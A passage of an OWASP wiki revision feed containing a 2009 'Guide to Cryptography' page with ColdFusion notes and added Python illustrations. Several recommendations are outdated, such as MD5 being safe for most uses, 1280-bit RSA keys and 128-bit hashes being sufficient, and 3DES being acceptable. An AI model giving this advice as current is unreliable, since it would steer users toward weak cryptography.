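    digest = hashlib.new(name, b"test").digest()
    assert len(digest) * 8 == bits  # each digest has the documented length
```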
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pluggable Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 introduced pluggable encryption for CFML. The JCE allows developers to specify multiple cryptographic service providers. ColdFusion can leverage the algorithms, feedback modes, and padding methods of third-party Java security providers to strengthen its cryptography functions. For example, ColdFusion can leverage the Bouncy Castle (&amp;lt;u&amp;gt;http://www.bouncycastle.org/&amp;lt;/u&amp;gt;) crypto package and use the SHA-224 algorithm for the hash() function or the Serpent block encryption for the encrypt() function.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
See Macromedia’s Strong Encryption in ColdFusion MX 7 technote for information on installing additional security providers for ColdFusion at http://www.macromedia.com/go/e546373d. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SSL'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion does not provide tags and functions for public-key encryption, but it can communicate over SSL. ColdFusion leverages the Sun JSSE to communicate over SSL with web and LDAP (lightweight directory access protocol) servers. ColdFusion uses the Java certificate database (e.g. jre_root/lib/security/cacerts) to store server certificates. It compares the certificates presented by remote systems to those stored in the database. It also retrieves the host system’s certificate from this database and presents it to remote systems when initiating the SSL handshake. Certificate information is then exposed as CGI variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices'''''&lt;br /&gt;
&lt;br /&gt;
*Enable /dev/urandom for higher entropy for random number generation&lt;br /&gt;
&lt;br /&gt;
*Call the randomize function before calling rand() or randRange() to seed the random number generator&lt;br /&gt;
&lt;br /&gt;
*DO NOT use the CFMX_COMPAT algorithms. Upgrade your application to use stronger cryptographic ciphers.&lt;br /&gt;
&lt;br /&gt;
*Use AES or higher for symmetric encryption &lt;br /&gt;
&lt;br /&gt;
*Use SHA-256 or higher for the hash function&lt;br /&gt;
&lt;br /&gt;
*Use a salt (or random string) for password generation with the hash function&lt;br /&gt;
&lt;br /&gt;
*Always use generateSecretKey() to generate keys of the appropriate length for Block Encryption algorithms unless a customized key is required&lt;br /&gt;
&lt;br /&gt;
*Use separate key databases to store remote server certificates separately from the ColdFusion server’s certificate&lt;br /&gt;
&lt;br /&gt;
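The salted-hash recommendation above applies beyond ColdFusion. A minimal Python sketch of the idea (not ColdFusion code; the function names are ours), using PBKDF2 so a salt and an iteration count are applied together:&lt;br /&gt;

```python
import hashlib
import hmac
import os

def hash_password(password: str) -> tuple[bytes, bytes]:
    # A fresh random salt per password: identical passwords yield
    # different digests, defeating precomputed (rainbow-table) attacks.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(candidate, expected)
```

Because each call draws a new salt, two users with the same password still store different digests.&lt;br /&gt;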
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Encryption]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59966</id>
		<title>Guide to Cryptography</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Guide_to_Cryptography&amp;diff=59966"/>
				<updated>2009-05-03T15:59:33Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Asymmetric Cryptography (also called Public/Private Key Cryptography) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that cryptography is safely used to protect the confidentiality and integrity of sensitive user data.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS5.18 – Cryptographic key management&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Initially confined to the realms of academia and the military, cryptography has become ubiquitous thanks to the Internet. Common everyday uses of cryptography include mobile phones, passwords, SSL, smart cards, and DVDs. Cryptography has permeated everyday life, and is heavily used by many web applications.&lt;br /&gt;
&lt;br /&gt;
Cryptography (or crypto) is one of the more advanced topics of information security, and one whose understanding requires the most schooling and experience. It is difficult to get right because there are many approaches to encryption, each with advantages and disadvantages that need to be thoroughly understood by web solution architects and developers.  In addition, serious cryptography research is typically based in advanced mathematics and number theory, providing a serious barrier to entry. &lt;br /&gt;
&lt;br /&gt;
The proper and accurate implementation of cryptography is critical to its efficacy. A small mistake in configuration or coding can remove much of the protection it affords, rendering the crypto implementation useless against serious attacks.&lt;br /&gt;
&lt;br /&gt;
A good understanding of crypto is required to be able to discern between solid products and snake oil. The inherent complexity of crypto makes it easy to fall for fantastic claims from vendors about their product. Typically, these are “a breakthrough in cryptography” or “unbreakable” or provide &amp;quot;military grade&amp;quot; security. If a vendor says &amp;quot;trust us, we have had experts look at this,” chances are they weren't experts!&lt;br /&gt;
&lt;br /&gt;
==Cryptographic Functions ==&lt;br /&gt;
&lt;br /&gt;
Cryptographic systems can provide one or more of the following four services. It is important to distinguish between these, as some algorithms are better suited to particular tasks than others.&lt;br /&gt;
&lt;br /&gt;
When analyzing your requirements and risks, you need to decide which of these four functions should be used to protect your data.&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Using a cryptographic system, we can establish the identity of a remote user (or system). A typical example is the SSL certificate of a web server providing proof to the user that he or she is connected to the correct server.&lt;br /&gt;
&lt;br /&gt;
The identity is not of the user, but of the cryptographic key of the user. Having a less secure key lowers the trust we can place on the identity.&lt;br /&gt;
&lt;br /&gt;
===Non-Repudiation ===&lt;br /&gt;
&lt;br /&gt;
The concept of non-repudiation is particularly important for financial or e-commerce applications. Often, cryptographic tools are required to prove that a unique user has made a transaction request. It must not be possible for the user to refute his or her actions.&lt;br /&gt;
&lt;br /&gt;
For example, a customer may request a transfer of money from her account to be paid to another account. Later, she claims never to have made the request and demands the money be refunded to the account. If we have non-repudiation through cryptography, we can prove, usually by digitally signing the transaction request, that the user authorized the transaction.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
More commonly, the biggest concern will be to keep information private. Cryptographic systems were originally developed to function in this capacity. Whether it be passwords sent during a log on process, or storing confidential medical records in a database, encryption can assure that only users who have access to the appropriate key will get access to the data.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
We can use cryptography to ensure that data is not altered during storage or transmission. Cryptographic hashes, for example, can safeguard data by providing a secure checksum.&lt;br /&gt;
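&lt;br /&gt;
As a language-neutral sketch of the secure-checksum idea (shown here in Python with the standard hmac module; the shared key is assumed to have been exchanged securely out of band), a keyed hash lets the receiver detect any alteration of the data:&lt;br /&gt;

```python
import hashlib
import hmac

KEY = b"shared-secret-key"  # assumption: distributed securely out of band

def sign(message: bytes) -> str:
    # HMAC-SHA256 over the message; an attacker without KEY cannot forge this.
    return hmac.new(KEY, message, hashlib.sha256).hexdigest()

def verify(message: bytes, tag: str) -> bool:
    # compare_digest performs a constant-time comparison.
    return hmac.compare_digest(sign(message), tag)
```

Unlike a plain hash, an attacker who modifies the message cannot recompute a valid tag without the key.&lt;br /&gt;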
&lt;br /&gt;
==Cryptographic Algorithms ==&lt;br /&gt;
&lt;br /&gt;
Various types of cryptographic systems exist, with different strengths and weaknesses. Typically, they are divided into two classes: those that are strong but slow to run, and those that are quick but less secure. Most often a combination of the two approaches is used (e.g. SSL), whereby we establish the connection with a secure algorithm, and then, if successful, encrypt the actual transmission with the weaker but much faster algorithm.&lt;br /&gt;
&lt;br /&gt;
===Symmetric Cryptography ===&lt;br /&gt;
&lt;br /&gt;
Symmetric Cryptography is the most traditional form of cryptography.  In a symmetric cryptosystem, the involved parties share a common secret (password, pass phrase, or key). Data is encrypted and decrypted using the same key. These algorithms tend to be comparatively fast, but they cannot be used unless the involved parties have already exchanged keys.  Any party possessing a specific key can create encrypted messages using that key as well as decrypt any messages encrypted with the key.  In systems involving a number of users who each need to set up independent, secure communication channels symmetric cryptosystems can have practical limitations due to the requirement to securely distribute and manage large numbers of keys.&lt;br /&gt;
&lt;br /&gt;
Common examples of symmetric algorithms are DES, 3DES and AES. The 56-bit keys used in DES are short enough to be easily brute-forced by modern hardware, and DES should no longer be used. Triple DES (or 3DES) applies the DES algorithm three times with different keys, giving it an effective key strength of 112 bits. Due to the problems with the DES algorithm, the United States National Institute of Standards and Technology (NIST) hosted a selection process for a new algorithm. The winning algorithm was Rijndael, and the associated cryptosystem is now known as the Advanced Encryption Standard or AES. For most applications 3DES is acceptably secure at the current time, but for most new applications it is advisable to use AES.&lt;br /&gt;
&lt;br /&gt;
===Asymmetric Cryptography (also called Public/Private Key Cryptography) ===&lt;br /&gt;
&lt;br /&gt;
Asymmetric algorithms use two keys: one to encrypt the data, and the other to decrypt it. These inter-dependent keys are generated together. One is labeled the Public Key and is distributed freely. The other is labeled the Private Key and must be kept hidden.&lt;br /&gt;
&lt;br /&gt;
Often referred to as Public/Private Key Cryptography, these cryptosystems can provide a number of different functions depending on how they are used. &lt;br /&gt;
&lt;br /&gt;
The most common usage of asymmetric cryptography is to send messages with a guarantee of confidentiality.  If User A wanted to send a message to User B, User A would get access to User B’s publicly-available Public Key.  The message is then encrypted with this key and sent to User B.  Because of the cryptosystem’s property that messages encoded with the Public Key of User B can only be decrypted with User B’s Private Key, only User B can read the message.&lt;br /&gt;
&lt;br /&gt;
Another usage scenario is one where User A wants to send User B a message and wants User B to have a guarantee that the message was sent by User A.  In order to accomplish this, User A would encrypt the message with their Private Key.  The message can then only be decrypted using User A’s Public Key.  This guarantees that User A created the message, because User A is the only entity with access to the Private Key required to create a message that can be decrypted by User A’s Public Key.  This is essentially a digital signature guaranteeing that the message was created by User A.&lt;br /&gt;
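&lt;br /&gt;
Both scenarios rest on the same mathematical property of the key pair. A deliberately toy Python illustration using textbook RSA with tiny primes (insecure by construction, for intuition only; real systems use padded RSA with 2048-bit or larger moduli):&lt;br /&gt;

```python
# Textbook RSA with tiny primes: for intuition only, never for real use.
p, q = 61, 53
n = p * q                  # public modulus (3233)
phi = (p - 1) * (q - 1)    # 3120
e = 17                     # public exponent
d = pow(e, -1, phi)        # private exponent: modular inverse of e

m = 65                     # a message, encoded as an integer < n

# Confidentiality: anyone can encrypt with the public key (e, n) ...
ciphertext = pow(m, e, n)
# ... but only the holder of the private exponent d can decrypt.
assert pow(ciphertext, d, n) == m

# Signing: "encrypt" with the private key ...
signature = pow(m, d, n)
# ... and anyone can verify with the public key.
assert pow(signature, e, n) == m
```

The asymmetry is visible in the exponents: what one key does, only the other can undo.&lt;br /&gt;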
&lt;br /&gt;
A Certificate Authority (CA), whose public certificates are installed with browsers or otherwise made commonly available, may also digitally sign public keys or certificates. We can authenticate remote systems or users via a mutual trust of an issuing CA. We trust their ‘root’ certificates, which in turn authenticate the public certificate presented by the server.&lt;br /&gt;
&lt;br /&gt;
PGP and SSL are prime examples of systems implementing asymmetric cryptography, using RSA or other algorithms.&lt;br /&gt;
&lt;br /&gt;
===Hashes ===&lt;br /&gt;
&lt;br /&gt;
Hash functions take some data of an arbitrary length (and possibly a key or password) and generate a fixed-length hash based on this input. Hash functions used in cryptography have the property that it is easy to calculate the hash, but difficult or impossible to re-generate the original input if only the hash value is known.  In addition, hash functions useful for cryptography  have the property that it is difficult to craft an initial input such that the hash will match a specific desired value.&lt;br /&gt;
&lt;br /&gt;
MD5 and SHA-1 are common hashing algorithms used today. These algorithms are considered weak (see below) and are likely to be replaced after a process similar to the AES selection. New applications should consider using SHA-256 instead of these weaker algorithms.&lt;br /&gt;
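&lt;br /&gt;
The fixed-length property is easy to observe with any standard library; a small Python sketch using hashlib:&lt;br /&gt;

```python
import hashlib

data = b"The quick brown fox jumps over the lazy dog"

# Digest length is fixed regardless of input size (shown in bits).
assert len(hashlib.md5(data).digest()) * 8 == 128
assert len(hashlib.sha1(data).digest()) * 8 == 160
assert len(hashlib.sha256(data).digest()) * 8 == 256

# A tiny change to the input yields a completely different digest.
h1 = hashlib.sha256(b"pay $100").hexdigest()
h2 = hashlib.sha256(b"pay $900").hexdigest()
assert h1 != h2
```
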
&lt;br /&gt;
===Key Exchange Algorithms ===&lt;br /&gt;
&lt;br /&gt;
Lastly, we have key exchange algorithms (such as Diffie-Hellman for SSL). These allow us to safely exchange encryption keys with an unknown party. &lt;br /&gt;
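&lt;br /&gt;
The arithmetic behind Diffie-Hellman fits in a few lines; a toy Python sketch with a tiny prime (real deployments use groups of 2048 bits or more):&lt;br /&gt;

```python
# Toy Diffie-Hellman: the prime is tiny for readability only.
p = 23   # public prime modulus
g = 5    # public generator

a = 6                    # Alice's private value (kept secret)
b = 15                   # Bob's private value (kept secret)
A = pow(g, a, p)         # Alice sends A over the open channel
B = pow(g, b, p)         # Bob sends B over the open channel

# Each side combines its own secret with the other's public value.
shared_alice = pow(B, a, p)
shared_bob = pow(A, b, p)
assert shared_alice == shared_bob   # both arrive at the same key
```

An eavesdropper sees p, g, A, and B but not a or b, and recovering them is the discrete logarithm problem.&lt;br /&gt;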
&lt;br /&gt;
==Algorithm Selection ==&lt;br /&gt;
&lt;br /&gt;
As modern cryptography relies on being computationally expensive to break, specific standards can be set for key sizes that will provide assurance that with today’s technology and understanding, it will take too long to decrypt a message by attempting all possible keys.&lt;br /&gt;
&lt;br /&gt;
Therefore, we need to ensure that both the algorithm and the key size are taken into account when selecting an algorithm.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Proprietary encryption algorithms are not to be trusted as they typically rely on ‘security through obscurity’ and not sound mathematics. These algorithms should be avoided if possible.&lt;br /&gt;
&lt;br /&gt;
Specific algorithms to avoid:&lt;br /&gt;
&lt;br /&gt;
* MD5 has recently been found less secure than previously thought. While still safe for most applications such as hashes for binaries made available publicly, secure applications should now be migrating away from this algorithm.&lt;br /&gt;
&lt;br /&gt;
* SHA-0 has been conclusively broken. It should no longer be used for any sensitive applications.&lt;br /&gt;
&lt;br /&gt;
* SHA-1 has been reduced in strength and we encourage a migration to SHA-256, which produces a larger digest.&lt;br /&gt;
&lt;br /&gt;
* DES was once the standard crypto algorithm for encryption; a normal desktop machine can now break it. AES is the current preferred symmetric algorithm.&lt;br /&gt;
&lt;br /&gt;
Cryptography is a constantly changing field. As new discoveries in cryptanalysis are made, older algorithms will be found unsafe. In addition, as computing power increases the feasibility of brute force attacks will render other cryptosystems or the use of certain key lengths unsafe. Standard bodies such as NIST should be monitored for future recommendations. &lt;br /&gt;
&lt;br /&gt;
Specific applications, such as banking transaction systems may have specific requirements for algorithms and key sizes.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assuming you have chosen an open, standard algorithm, the following recommendations should be considered when reviewing algorithms:&lt;br /&gt;
&lt;br /&gt;
'''Symmetric:'''&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems such as large financial transactions&lt;br /&gt;
&lt;br /&gt;
'''Asymmetric:'''&lt;br /&gt;
&lt;br /&gt;
The difficulty of cracking a 2048-bit key compared to a 1024-bit key is far more than the factor of two you might expect. Don’t use excessive key sizes unless you know you need them. Bruce Schneier in 2002 (see the references section) recommended the following key lengths for circa-2005 threats:&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 1280 bits are sufficient for most personal applications&lt;br /&gt;
&lt;br /&gt;
* 1536 bits should be acceptable today for most secure applications&lt;br /&gt;
&lt;br /&gt;
* 2048 bits should be considered for highly protected applications.&lt;br /&gt;
&lt;br /&gt;
'''Hashes:'''&lt;br /&gt;
&lt;br /&gt;
* Hash sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems, as many hash functions are currently being revised (see above).&lt;br /&gt;
&lt;br /&gt;
NIST and other standards bodies will provide up to date guidance on suggested key sizes.&lt;br /&gt;
&lt;br /&gt;
'''Design your application to cope with new hashes and algorithms'''&lt;br /&gt;
&lt;br /&gt;
==Key Storage ==&lt;br /&gt;
&lt;br /&gt;
As highlighted above, crypto relies on keys to assure a user’s identity, provide confidentiality and integrity as well as non-repudiation. It is vital that the keys are adequately protected. Should a key be compromised, it can no longer be trusted.&lt;br /&gt;
&lt;br /&gt;
Any system that has been compromised in any way should have all its cryptographic keys replaced. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Unless you are using hardware cryptographic devices, your keys will most likely be stored as binary files on the system providing the encryption. &lt;br /&gt;
&lt;br /&gt;
Can you export the private key or certificate from the store? &lt;br /&gt;
&lt;br /&gt;
* Are any private keys or certificate import files (usually in PKCS#12 format) on the file system? Can they be imported without a password?&lt;br /&gt;
&lt;br /&gt;
* Keys are often stored in code. This is a bad idea, as it means you will not be able to easily replace keys should they become compromised.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Cryptographic keys should be protected as much as is possible with file system permissions. They should be read only and only the application or user directly accessing them should have these rights.&lt;br /&gt;
&lt;br /&gt;
* Private keys should be marked as not exportable when generating the certificate signing request. &lt;br /&gt;
&lt;br /&gt;
* Once imported into the key store (CryptoAPI, Certificates snap-in, Java Key Store, etc.), the private certificate import file obtained from the certificate provider should be securely deleted from front-end systems and kept in a physical safe until required (such as when installing or replacing a front-end server).&lt;br /&gt;
&lt;br /&gt;
* Host based intrusion systems should be deployed to monitor access of keys. At the very least, changes in keys should be monitored.&lt;br /&gt;
&lt;br /&gt;
* Applications should log any changes to keys. &lt;br /&gt;
&lt;br /&gt;
* Pass phrases used to protect keys should be stored in physically secure places; in some environments, it may be necessary to split the pass phrase or password into two components such that two people will be required to authorize access to the key. These physical, manual processes should be tightly monitored and controlled.&lt;br /&gt;
&lt;br /&gt;
* Storage of keys within source code or binaries should be avoided. This not only has consequences if developers have access to source code, but key management will be almost impossible.&lt;br /&gt;
&lt;br /&gt;
* In a typical web environment, web servers themselves will need permission to access the key. This has obvious implications that other web processes or malicious code may also have access to the key. In these cases, it is vital to minimize the functionality of the system and application requiring access to the keys.&lt;br /&gt;
&lt;br /&gt;
* For interactive applications, a sufficient safeguard is to use a pass phrase or password to encrypt the key when stored on disk. This requires the user to supply a password on startup, but means the key can safely be stored in cases where other users may have greater file system privileges.&lt;br /&gt;
&lt;br /&gt;
Storage of keys in hardware crypto devices is beyond the scope of this document. If you require this level of security, you should really be consulting with crypto specialists.&lt;br /&gt;
&lt;br /&gt;
==Insecure transmission of secrets ==&lt;br /&gt;
&lt;br /&gt;
In security, we assess the level of trust we have in information. When applied to transmission of sensitive data, we need to ensure that encryption occurs before we transmit the data onto any untrusted network. &lt;br /&gt;
&lt;br /&gt;
In practical terms, this means we should aim to encrypt as close to the source of the data as possible.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
This can be extremely difficult without expert help. We can try to at least eliminate the most common problems:&lt;br /&gt;
&lt;br /&gt;
* The encryption algorithm or protocol needs to be adequate to the task. The above discussion on weak algorithms and weak keys should be a good starting point.&lt;br /&gt;
&lt;br /&gt;
* We must ensure that through all paths of the transmission we apply this level of encryption.&lt;br /&gt;
&lt;br /&gt;
* Extreme care needs to be taken at the point of encryption and decryption. If your encryption library needs to use temporary files, are these adequately protected? &lt;br /&gt;
&lt;br /&gt;
* Are keys stored securely? Is an unsecured file left behind after it has been encrypted?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
We have the possibility to encrypt or otherwise protect data at different levels. Choosing the right place for this to occur can involve looking at both security as well as resource requirements. &lt;br /&gt;
&lt;br /&gt;
'''Application''': at this level, the actual application performs the encryption or other crypto function. This is the most desirable, but can place additional strain on resources and create unmanageable complexity. Encryption would typically be performed through an API such as the OpenSSL toolkit (www.openssl.org) or operating-system-provided crypto functions.&lt;br /&gt;
&lt;br /&gt;
An example would be an S/MIME encrypted email, which is transmitted as encoded text within a standard email. No changes to intermediate email hosts are necessary to transmit the message because we do not require a change to the protocol itself.&lt;br /&gt;
&lt;br /&gt;
'''Protocol''': at this layer, the protocol provides the encryption service. Most commonly, this is seen in HTTPS, using SSL encryption to protect sensitive web traffic. The application no longer needs to implement secure connectivity. However, this does not mean the application has a free ride. SSL requires careful attention when used for mutual (client-side) authentication, as there are two different session keys, one for each direction. Each should be verified before transmitting sensitive data.&lt;br /&gt;
&lt;br /&gt;
Attackers and penetration testers love SSL to hide malicious requests (such as injection attacks for example). Content scanners are most likely unable to decode the SSL connection, letting it pass to the vulnerable web server.&lt;br /&gt;
&lt;br /&gt;
'''Network''': below the protocol layer, we can use technologies such as Virtual Private Networks (VPN) to protect data. This has many incarnations, the most popular being IPsec (Internet Protocol Security), typically implemented as a protected ‘tunnel’ between two gateway routers. Neither the application nor the protocol needs to be crypto aware – all traffic is encrypted regardless.&lt;br /&gt;
&lt;br /&gt;
Possible issues at this level are computational and bandwidth overheads on network devices.&lt;br /&gt;
&lt;br /&gt;
==Reversible Authentication Tokens ==&lt;br /&gt;
&lt;br /&gt;
Today’s web servers typically deal with large numbers of users. Differentiating between them is often done through cookies or other session identifiers. If these session identifiers use a predictable sequence, an attacker need only generate a value in the sequence in order to present a seemingly valid session token.&lt;br /&gt;
&lt;br /&gt;
This can occur at a number of places; the network level for TCP sequence numbers, or right through to the application layer with cookies used as authenticating tokens.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Any deterministic sequence generator is likely to be vulnerable.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The only way to generate secure authentication tokens is to ensure there is no way to predict their sequence. In other words: true random numbers.&lt;br /&gt;
&lt;br /&gt;
It could be argued that computers cannot generate true random numbers, but techniques such as reading mouse movements and keystrokes to improve entropy have significantly increased the randomness of random number generators. It is critical that you do not try to implement this on your own; use of existing, proven implementations is highly desirable.&lt;br /&gt;
&lt;br /&gt;
Most operating systems include functions to generate random numbers that can be called from almost any programming language.&lt;br /&gt;
&lt;br /&gt;
'''Windows &amp;amp; .NET:''' On Microsoft platforms including .NET, it is recommended to use the inbuilt CryptGenRandom function (&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/seccrypto/security/cryptgenrandom.asp&amp;lt;/u&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
'''Unix:''' For all Unix based platforms, OpenSSL is an excellent option (&amp;lt;u&amp;gt;http://www.openssl.org/&amp;lt;/u&amp;gt;). It features tools and API functions to generate random numbers. On some platforms, /dev/urandom is a suitable source of pseudo-random entropy.&lt;br /&gt;
&lt;br /&gt;
'''PHP:'''  mt_rand() uses a Mersenne Twister, but is nowhere near as good as CryptoAPI’s secure random number generation options, OpenSSL, or /dev/urandom which is available on many Unix variants. mt_rand() has been noted to produce the same number on some platforms – test prior to deployment. '''Do not use rand() as it is very weak.'''&lt;br /&gt;
&lt;br /&gt;
'''Java:''' java.security.SecureRandom within the Java Cryptography Extension (JCE) provides secure random numbers. This should be used in preference to other random number generators.&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion: '''ColdFusion MX 7 leverages the JCE java.security.SecureRandom class of the underlying JVM as its pseudo-random number generator (PRNG).&lt;br /&gt;
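&lt;br /&gt;
In Python (not listed above), the standard-library secrets module wraps the same OS-level CSPRNG sources and is the analogous choice:&lt;br /&gt;

```python
import secrets

# secrets draws from the operating system's CSPRNG
# (e.g. /dev/urandom on Unix, CryptGenRandom on Windows).
session_token = secrets.token_urlsafe(32)   # ~256 bits, cookie-safe text

# By contrast, the random module is a Mersenne Twister: fast, but
# predictable once enough outputs are observed. Never use it for tokens.
```
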
&lt;br /&gt;
==Safe UUID generation ==&lt;br /&gt;
&lt;br /&gt;
UUIDs (such as GUIDs and so on) are only unique if you generate them. This seems relatively straightforward. However, there are many code snippets available that contain existing UUIDs. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
# Determine the source of your existing UUIDs &lt;br /&gt;
## Did they come from MSDN?&lt;br /&gt;
## Or from an example found on the Internet? &lt;br /&gt;
# Use your favorite search engine to find out&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not cut and paste UUIDs and GUIDs from anything other than the UUIDGEN program or from the UuidCreate() API&lt;br /&gt;
&lt;br /&gt;
* Generate fresh UUIDs or GUIDs for each new program &lt;br /&gt;
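&lt;br /&gt;
In code, the fix is simply to call the platform’s generator at the point of use; a Python sketch with the standard uuid module:&lt;br /&gt;

```python
import uuid

# uuid4() returns a fresh, randomly generated UUID on every call;
# never paste a literal UUID copied from documentation or sample code.
first = uuid.uuid4()
second = uuid.uuid4()
assert first != second       # each call produces a distinct value
assert first.version == 4    # version 4 = randomly generated UUID
```
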
&lt;br /&gt;
==Summary ==&lt;br /&gt;
&lt;br /&gt;
Cryptography is one of the pillars of information security. Its usage and propagation have exploded due to the Internet, and it is now included in most areas of computing. Crypto can be used for:&lt;br /&gt;
&lt;br /&gt;
* Remote access such as IPsec VPN&lt;br /&gt;
&lt;br /&gt;
* Certificate based authentication&lt;br /&gt;
&lt;br /&gt;
* Securing confidential or sensitive information&lt;br /&gt;
&lt;br /&gt;
* Obtaining non-repudiation using digital certificates&lt;br /&gt;
&lt;br /&gt;
* Online orders and payments&lt;br /&gt;
&lt;br /&gt;
* Email and messaging security such as S/MIME&lt;br /&gt;
&lt;br /&gt;
A web application can implement cryptography at multiple layers: application, application server or runtime (such as .NET), operating system, and hardware. Selecting an optimal approach requires a good understanding of the application requirements, the areas of risk, and the required level of security strength, as well as flexibility, cost, and so on.&lt;br /&gt;
&lt;br /&gt;
Although cryptography is not a panacea, the majority of security breaches do not come from brute-force computation but from exploiting mistakes in implementation. The strength of a cryptographic system is often measured by its key length, yet using a large key and then storing the unprotected keys on the same server eliminates most of the protection gained. Besides the insecure storage of keys, another classic mistake is engineering custom cryptographic algorithms (to generate random session IDs, for example). Many web applications have been successfully attacked because their developers thought they could create their own crypto functions. &lt;br /&gt;
&lt;br /&gt;
Our recommendation is to use proven products, tools, or packages rather than rolling your own.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Wu, H., ''Misuse of stream ciphers in Word and Excel''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://eprint.iacr.org/2005/007.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Bindview, ''Vulnerability in Windows NT's SYSKEY encryption'' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.bindview.com/Services/razor/Advisories/1999/adv_WinNT_syskey.cfm&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Schneier, B., ''Is 1024 Bits Enough?'', April 2002 Cryptogram&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.schneier.com/crypto-gram-0204.html#3&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Schneier, B., Cryptogram, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.counterpane.com/cryptogram.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* NIST, Replacing SHA-1 with stronger variants: SHA-256 to SHA-512&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkhash.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkencryption.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* UUIDs are only unique if you generate them:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/larryosterman/archive/2005/07/21/441417.aspx&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Cryptographically Secure Random Numbers on Win32:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cryptography ==&lt;br /&gt;
&lt;br /&gt;
The following section describes ColdFusion’s cryptography features. ColdFusion MX leverages the Java Cryptography Extension (JCE) of the underlying J2EE platform for cryptography and random number generation. It provides functions for symmetric (or private-key) encryption. While it does not provide native functionality for public-key (asymmetric) encryption, it does use the Java Secure Socket Extension (JSSE) for SSL communication.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pseudo-Random Number Generation'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides three functions for random number generation: rand(), randomize(), and randRange(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
